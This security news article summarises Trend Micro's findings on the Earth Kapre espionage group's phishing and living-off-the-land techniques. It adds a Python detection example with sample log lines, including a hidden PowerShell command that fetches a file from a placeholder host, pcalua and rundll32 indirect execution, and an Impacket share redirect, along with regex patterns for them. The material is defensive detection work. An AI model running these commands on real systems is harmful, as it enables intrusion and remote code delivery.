Trend Micro’s Investigation Reveals Earth Kapre’s Evasive Cyber Espionage Techniques

Source: Trend Micro


An investigation into a series of cyber espionage activities has attributed them to a threat group tracked as Earth Kapre, also known as RedCurl and Red Wolf. As detailed in Trend Micro's report, this group targets a wide array of countries including Russia, Germany, Ukraine, the UK, Slovenia, Canada, Australia, and the US. Its attacks begin with phishing emails carrying malicious attachments in the form of .iso and .img files. When these attachments are opened, they trigger unauthorized data collection and establish communication with command-and-control (C&C) servers.

Central to Earth Kapre's strategy is the exploitation of native Windows tools to infiltrate and maintain their presence within targeted systems. The group initiates its attack chain by using a PowerShell command to download and execute "curl.exe" in the system's directory, facilitating further malicious downloads including the 7-Zip archiving tool. Trend Micro's report highlights an intricate obfuscation technique where attackers use batch files to execute complex commands, complicating the analysis and detection of their activities.

The attackers also ensure their persistence in compromised systems by creating scheduled tasks. Trend Micro's findings include the utilization of Impacket for Server Message Block (SMB) interactions and the exploitation of the Program Compatibility Assistant (pcalua.exe) to indirectly execute malicious commands, showcasing the group's adeptness at bypassing security measures. For cybersecurity detection engineers, key indicators of Earth Kapre's activities to monitor include PowerShell downloads and script executions, usage of "rundll32", evidence of Impacket usage, and the unusual application of "pcalua.exe" for indirect command execution.
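As an added illustration (not code from Trend Micro's report or from this article), the indicators listed above expressed as simple detection rules run over a few constructed process-creation log lines. The "parent|image|command line" log format, the file paths and hostnames, and the Impacket command-line artefact (the commonly documented `1> \\127.0.0.1\ADMIN$\__<id> 2>&1` redirect) are assumptions for the example, not details taken from the report.

```python
import re

# Constructed process-creation events in a simplified "parent|image|command line"
# format (not from the Trend Micro report). Hosts and paths are placeholders.
SAMPLE_EVENTS = [
    'explorer.exe|powershell.exe|powershell -w hidden -c "iwr http://PLACEHOLDER/c.bin -OutFile C:\\Windows\\curl.exe"',
    'cmd.exe|pcalua.exe|pcalua.exe -a C:\\Users\\Public\\run.bat',
    'cmd.exe|rundll32.exe|rundll32.exe C:\\Users\\Public\\lib.dll,Start',
    'services.exe|cmd.exe|cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1709 2>&1',
    'explorer.exe|winword.exe|winword.exe /n report.docx',
]

# Each rule: (name, image the rule applies to, regex over the command line).
RULES = [
    # PowerShell fetching content from a URL (download cradle / curl.exe staging).
    ("powershell_download", "powershell.exe",
     re.compile(r"(invoke-webrequest|iwr\b|downloadfile|downloadstring|curl\b|wget\b).*https?://", re.I)),
    # Program Compatibility Assistant used as an indirect launcher ("-a <target>").
    ("pcalua_indirect_exec", "pcalua.exe", re.compile(r"\s-a\s", re.I)),
    # rundll32 loading a DLL from a user-writable location.
    ("rundll32_user_writable_dll", "rundll32.exe",
     re.compile(r"(\\users\\|\\programdata\\|\\temp\\)[^,\s]*\.dll", re.I)),
    # Assumed Impacket artefact: output redirected to the ADMIN$ share over loopback.
    ("impacket_admin_share_redirect", "cmd.exe",
     re.compile(r"1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__\d+", re.I)),
]


def parse_event(line):
    """Split one constructed log line into its parent, image and command line."""
    parent, image, cmdline = line.split("|", 2)
    return {"parent": parent.lower(), "image": image.lower(), "cmdline": cmdline}


def match_rules(event):
    """Return the names of all rules whose image and command-line pattern match."""
    return [name for name, image, rx in RULES
            if event["image"] == image and rx.search(event["cmdline"])]


def detect(lines):
    """Run every rule over every line; return (rule, image, command line) hits."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        for name in match_rules(ev):
            hits.append((name, ev["image"], ev["cmdline"]))
    return hits


if __name__ == "__main__":
    for rule, image, cmdline in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {image}: {cmdline}")
```

Real telemetry (Sysmon event 1, EDR process events) carries parent and user fields that should tighten these rules, for example requiring a services.exe parent for the Impacket pattern.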

Trend Micro's detailed analysis of Earth Kapre's sophisticated methods complements Proofpoint's recent findings on TA577, which also employs phishing campaigns to harvest NTLM authentication data. This convergence highlights a broader trend where such data harvesting could potentially set the stage for malicious SMB activities.
